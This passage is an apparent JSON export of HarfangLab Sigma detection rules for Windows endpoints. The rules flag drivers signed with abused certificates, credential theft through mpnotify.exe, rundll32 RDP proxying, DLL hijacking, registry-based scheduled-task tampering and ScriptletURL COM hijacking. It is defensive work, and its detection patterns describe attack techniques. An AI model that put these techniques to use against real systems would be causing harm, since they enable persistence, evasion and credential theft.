Technology Development Co., Ltd\n - 'C61A221389C98EE2FBC0E57A62DEE5A915E6C509' # VeriSign Class 3 Code Signing 2010 CA - Fuqing Yuntan Network Tech Co.,Ltd.\n - '7B69FF55D3C39BD7D67A10F341C1443425F0C83F' # VeriSign Class 3 Code Signing 2010 CA - Zhuhai liancheng Technology Co., Ltd.\n - '864FD20B322E8C7CDB0D7AA69C8475F09D602C3D' # VeriSign Class 3 Code Signing 2010 CA - Baoji zhihengtaiye co.,ltd\n - '85C58500333C98954160FCA3EE9A26B659A5F451' # VeriSign Class 3 Code Signing 2010 CA - Jiangsu innovation safety assessment Co., Ltd.\n - 'D715230B535C8937B469632EC6158761FD18AD21' # VeriSign Class 3 Code Signing 2010 CA - Shenzhen Luyoudashi Technology Co., Ltd.\n - 'DF788AA00EB400B552923518108EB1D4F5B7176B' # VeriSign Class 3 Code Signing 2010 CA - Beijing JoinHope Image Technology Ltd.\n - '775141B89F48B71DADC19F13011A46E537E7029C' # Thawte Code Signing CA - NHN USA Inc.\n # https://twitter.com/1ZRR4H/status/1699923793077055821\n # https://bazaar.abuse.ch/sample/1fc7dbbff1ea28f00d8c32de90c2559e4aa3629d26627094e92ff111e1092875/\n - '21A97512A2959B0E74729BE220102AEF1DCF56FD'\n # Koi Loader\n # https://www.virustotal.com/gui/file/a43d460e43d27df91c02292c1e7d5d7920c2b3dc3b2749b1bbc7f28657588947\n - '2A0B1BEDF4CCC933A5FDB885EDA8211F9B258ABE'\n # https://www.elastic.co/security-labs/abyssworker\n - '0786E6A95B9B6FC9495F319AC2E334103AAB292F'\n - '811500AD165F66CAD3E607CD1253A5EDC91CB4D0'\n - 'D01B544CF4A4F901FA496BEA2B3A8F66F9583CB2'\n - '7749BE16F266669D505684E9F002C689706C4295'\n - '00F1435238447BBA9560E2A9A8C781861EBB15BC'\n - 'D36A5F40D62A4CCB0CFF098D0BBFAA30257D487D'\n - 'DA2CFA2262049049A7A2CA8FAF463669F19B8D5F'\n - '45D2D18BCCD270185F012271C1D6B7C890BA7C02'\n - '18760B486C35B6FF79EA5C461313DE2087353FEA'\n # https://x.com/tangent65536/status/1914373135337701588\n - '22EACBF575EA3FF19A6F639E80E8768405C9BDFE'\n # https://expel.com/blog/you-dont-find-manualfinder-manualfinder-finds-you/\n # https://www.truesec.com/hub/blog/tamperedchef-the-bad-pdf-editor\n - '99201EEE9807D24851026A8E8884E4C40245FAC7' # GLINT SOFTWARE SDN. BHD.\n - 'A2278EB6A438DC528F3EBFEB238028C474401BEF' # Echo Infini Sdn. Bhd.\n - '29338264019B62D11F9C6C4B5A69B78B899B4DF6' # ECHO INFINI SDN. BHD.\n - '17F77710C888E30917F71F7909086BCC2D131F61' # Byte Media Sdn. Bhd.\n - '7533D9D9C5241D0E031C21304C6A3FF064F79072' # ECHO INFINI SDN. BHD.\n - '3B5253A4853056458675B5CB1903C05BC2DBBD1B' # BLACK INDIGO LTD\n - '76C675514EEC3A27A4E551A77ED30FBB0DC43A01' # Summit Nexus Holdings LLC\n # https://www.virustotal.com/gui/file/f9dd0b57a5c133ca0c4cab3cca1ac8debdc4a798b452167a1e5af78653af00c1\n - '9A6EE51A6A437603ACEE9ADC5F1A5F13329A7E59'\n # https://securelist.com/honeymyte-kernel-mode-rootkit/118590/\n # https://www.virustotal.com/gui/file/dc8b123d91a29661c92b0de3d4f06e0ca17b0633b87e45c09245d82bb84f3860\n - '1F33285626E81F4845936C7A2A55A46F6DADA651'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1b15c2a0-d1d2-4628-a592-e6c9c314baff",
"rule_name": "Driver Loaded Signed with Malicious Certificate",
"rule_description": "Detects the loading of drivers signed with a certificate that was used by malicious actors.\nThis can be indicative of a malicious actor trying to evade EDR/AV solutions with a forged signature.\nIt is recommended to analyze the loaded driver for malicious contents.\n",
"rule_creation_date": "2022-07-21",
"rule_modified_date": "2025-12-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1b1d99a0-6099-42fb-91b2-87fead258765",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071746Z",
"creation_date": "2026-03-23T11:45:34.071748Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071752Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.scip.ch/en/?labs.20220217",
"https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
"https://attack.mitre.org/techniques/T1556/008/"
],
"name": "t1556_008_file_dropped_mpnotify.yml",
"content": "title: File Written to Disk by mpnotify.exe\nid: 1b1d99a0-6099-42fb-91b2-87fead258765\ndescription: |\n Detects when a file is written to disk by the mpnotify process.\n This may be a consequence of an attacker trying to access users' credentials using a malicious Network Provider.\n It is recommended to investigate the content of the written file, the DLL loaded by the mpnotify process to look for unsigned libraries, as well as indicators of a Network Provider installation.\nreferences:\n - https://www.scip.ch/en/?labs.20220217\n - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy\n - https://attack.mitre.org/techniques/T1556/008/\ndate: 2023/08/08\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1556.008\n - attack.t1112\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image|endswith: '\\mpnotify.exe'\n\n exclusion_citrix:\n Path:\n - '?:\\Program Files\\Citrix\\Secure Access Client\\logs\\nsnp.txt'\n - '?:\\Program Files (x86)\\Citrix\\Secure Access Client\\logs\\nsnp.txt'\n - '?:\\ProgramData\\Citrix\\AGEE\\nsnp.txt'\n - '?:\\Program Files\\Citrix\\Secure Access Client\\logs\\csa_nsnp.txt'\n - '?:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Citrix\\AGEE\\config.js'\n\n exclusion_dell:\n Path: '?:\\Windows\\Temp\\14ADCEAA-576A-45E5-94B5-EE925ED3E963'\n\n exclusion_novell:\n # https://beta.novell.com/documentation/zenworks-2020/zen_fde_agent/data/bryok2g.html\n Path:\n - '*\\PBA.log'\n - '*\\FDE.log'\n - '?:\\Windows\\System32\\ZCredMgr.LOG'\n - '?:\\Windows\\System32\\ZenCredManager.LOG'\n\n exclusion_crypto_key:\n Path:\n - '?:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\3310a4fa6cb9c60504498d7eea986fc2_????????-????-????-????-????????????'\n - 
'?:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\a398a5cd31e2b6b587ab0b426ca6dc4d_????????-????-????-????-????????????'\n - '?:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\a398a5cd31e2b6b587ab0b426ca6dc4d_????????-????-????-????-????????????'\n\n exclusion_f5:\n Path: '?:\\Windows\\Temp\\f5netprov.txt'\n\n exclusion_windhawk:\n Path: '?:\\ProgramData\\Windhawk\\Engine\\ModsWritable\\mod-task\\\\*_slick-window-arrangement'\n\n exclusion_zsso:\n Path|startswith: '?:\\Windows\\Temp\\zsso\\ZCredentialManager'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1b1d99a0-6099-42fb-91b2-87fead258765",
"rule_name": "File Written to Disk by mpnotify.exe",
"rule_description": "Detects when a file is written to disk by the mpnotify process.\nThis may be a consequence of an attacker trying to access users' credentials using a malicious Network Provider.\nIt is recommended to investigate the content of the written file, the DLL loaded by the mpnotify process to look for unsigned libraries, as well as indicators of a Network Provider installation.\n",
"rule_creation_date": "2023-08-08",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1556.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1b3ebc5b-072e-4731-938e-df8d4ab5c802",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083394Z",
"creation_date": "2026-03-23T11:45:34.083397Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083401Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
"https://attack.mitre.org/techniques/T1021/001/"
],
"name": "t1021_001_unusual_process_rdp.yml",
"content": "title: RDP Connection Initiated by Unusual Process\nid: 1b3ebc5b-072e-4731-938e-df8d4ab5c802\ndescription: |\n Detects an RDP connection initiated by an unusual process.\n Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\n Attackers can proxy RDP traffic via a legitimate Windows process such as RunDLL32 to reduce the exposure of their own infrastructure and evade detection.\n It is recommended to analyze the context and user around this RDP connection to determine if this connection is the result of legitimate administrative operations.\nreferences:\n - https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1021/001/\ndate: 2024/02/22\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n DestinationPort: '3389'\n ProcessOriginalFileName: 'rundll32.exe'\n Initiated: 'true'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1b3ebc5b-072e-4731-938e-df8d4ab5c802",
"rule_name": "RDP Connection Initiated by Unusual Process",
"rule_description": "Detects an RDP connection initiated by an unusual process.\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\nAttackers can proxy RDP traffic via a legitimate Windows process such as RunDLL32 to reduce the exposure of their own infrastructure and evade detection.\nIt is recommended to analyze the context and user around this RDP connection to determine if this connection is the result of legitimate administrative operations.\n",
"rule_creation_date": "2024-02-22",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1b4396df-ab50-493f-8787-8ca376e71f09",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619180Z",
"creation_date": "2026-03-23T11:45:34.619182Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619186Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/",
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wsmprovhost.yml",
"content": "title: DLL Hijacking via wsmprovhost.exe\nid: 1b4396df-ab50-493f-8787-8ca376e71f09\ndescription: |\n Detects potential Windows DLL Hijacking via wsmprovhost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wsmprovhost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DSROLE.dll'\n - '\\mi.dll'\n - '\\miutils.dll'\n - '\\wsmsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1b4396df-ab50-493f-8787-8ca376e71f09",
"rule_name": "DLL Hijacking via wsmprovhost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wsmprovhost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1b45b5ab-100f-4546-9d16-1e8f6b6cb22b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078559Z",
"creation_date": "2026-03-23T11:45:34.078561Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078565Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/netero1010/GhostTask",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1112_scheduled_task_updated_registry.yml",
"content": "title: Scheduled Task Actions Updated via Registry Modification\nid: 1b45b5ab-100f-4546-9d16-1e8f6b6cb22b\ndescription: |\n Detects the update of scheduled task actions via a manual registry modification.\n Scheduled tasks are often used by attackers as persistence mechanisms.\n To evade detection, they can update an existing scheduled task through a registry key manipulation, however, SYSTEM privileges are required.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://github.com/netero1010/GhostTask\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2024/01/04\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\\\*\\Actions'\n ProcessImage|contains: '\\'\n\n filter_scheduler:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs' # windows 7\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s Schedule' # Windows 10 1703\n\n exclusion_windeploy:\n ProcessCommandLine:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe /preoobe'\n - '?:\\Windows\\System32\\oobe\\Setup.exe'\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\windeploy.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1b45b5ab-100f-4546-9d16-1e8f6b6cb22b",
"rule_name": "Scheduled Task Actions Updated via Registry Modification",
"rule_description": "Detects the update of scheduled task actions via a manual registry modification.\nScheduled tasks are often used by attackers as persistence mechanisms.\nTo evade detection, they can update an existing scheduled task through a registry key manipulation, however, SYSTEM privileges are required.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2024-01-04",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1b63e7c7-7ee6-45a2-9107-662ddc98a824",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091179Z",
"creation_date": "2026-03-23T11:45:34.091181Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091186Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wowreg32.yml",
"content": "title: DLL Hijacking via wowreg32.exe\nid: 1b63e7c7-7ee6-45a2-9107-662ddc98a824\ndescription: |\n Detects potential Windows DLL Hijacking via wowreg32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wowreg32.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\devrtl.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1b63e7c7-7ee6-45a2-9107-662ddc98a824",
"rule_name": "DLL Hijacking via wowreg32.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wowreg32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1b8277e3-f753-4c37-9719-e62bb969c2b3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627150Z",
"creation_date": "2026-03-23T11:45:34.627152Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627156Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2020/05/20/persistence-com-hijacking/",
"https://github.com/LOLBAS-Project/LOLBAS/blob/master/Archive-Old-Version/OSScripts/Slmgr.vbs.md",
"https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/",
"https://attack.mitre.org/techniques/T1216/",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1546/015/"
],
"name": "t1216_com_hijacking_remote_scriptlet_registry.yml",
"content": "title: Registry ScriptletURL Modified\nid: 1b8277e3-f753-4c37-9719-e62bb969c2b3\ndescription: |\n Detects the registration of a remote Windows Scripting Component via the ScriptletURL registry key.\n This key defines the remote location of the arbitrary .sct file that will be downloaded and executed when the related COM class is invoked.\n Attackers can use a remote malicious scriptlet to achieve persistence and evade detection.\n It is recommended to check for other suspicious activities by the process making the registry modification.\nreferences:\n - https://pentestlab.blog/2020/05/20/persistence-com-hijacking/\n - https://github.com/LOLBAS-Project/LOLBAS/blob/master/Archive-Old-Version/OSScripts/Slmgr.vbs.md\n - https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/\n - https://attack.mitre.org/techniques/T1216/\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2022/11/14\nmodified: 2026/02/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - attack.t1112\n - attack.persistence\n - attack.t1546.015\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\CLSID\\{????????-????-????-????-????????????}\\ScriptletURL\\(Default)'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_setuphost:\n ProcessParentImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n\n exclusion_dismhost:\n ProcessImage: '?:\\windows\\temp\\\\????????-????-????-????-????????????\\dismhost.exe'\n\n exclusion_tiworker:\n ProcessImage: '?:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\tiworker.exe'\n\n exclusion_update:\n ProcessImage: '?:\\Windows\\System32\\poqexec.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1b8277e3-f753-4c37-9719-e62bb969c2b3",
"rule_name": "Registry ScriptletURL Modified",
"rule_description": "Detects the registration of a remote Windows Scripting Component via the ScriptletURL registry key.\nThis key defines the remote location of the arbitrary .sct file that will be downloaded and executed when the related COM class is invoked.\nAttackers can use a remote malicious scriptlet to achieve persistence and evade detection.\nIt is recommended to check for other suspicious activities by the process making the registry modification.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1216",
"attack.t1546.015"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1b864817-8a01-4cfe-9481-20ce115320c8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296790Z",
"creation_date": "2026-03-23T11:45:35.296792Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296797Z",
"rule_level": "high",
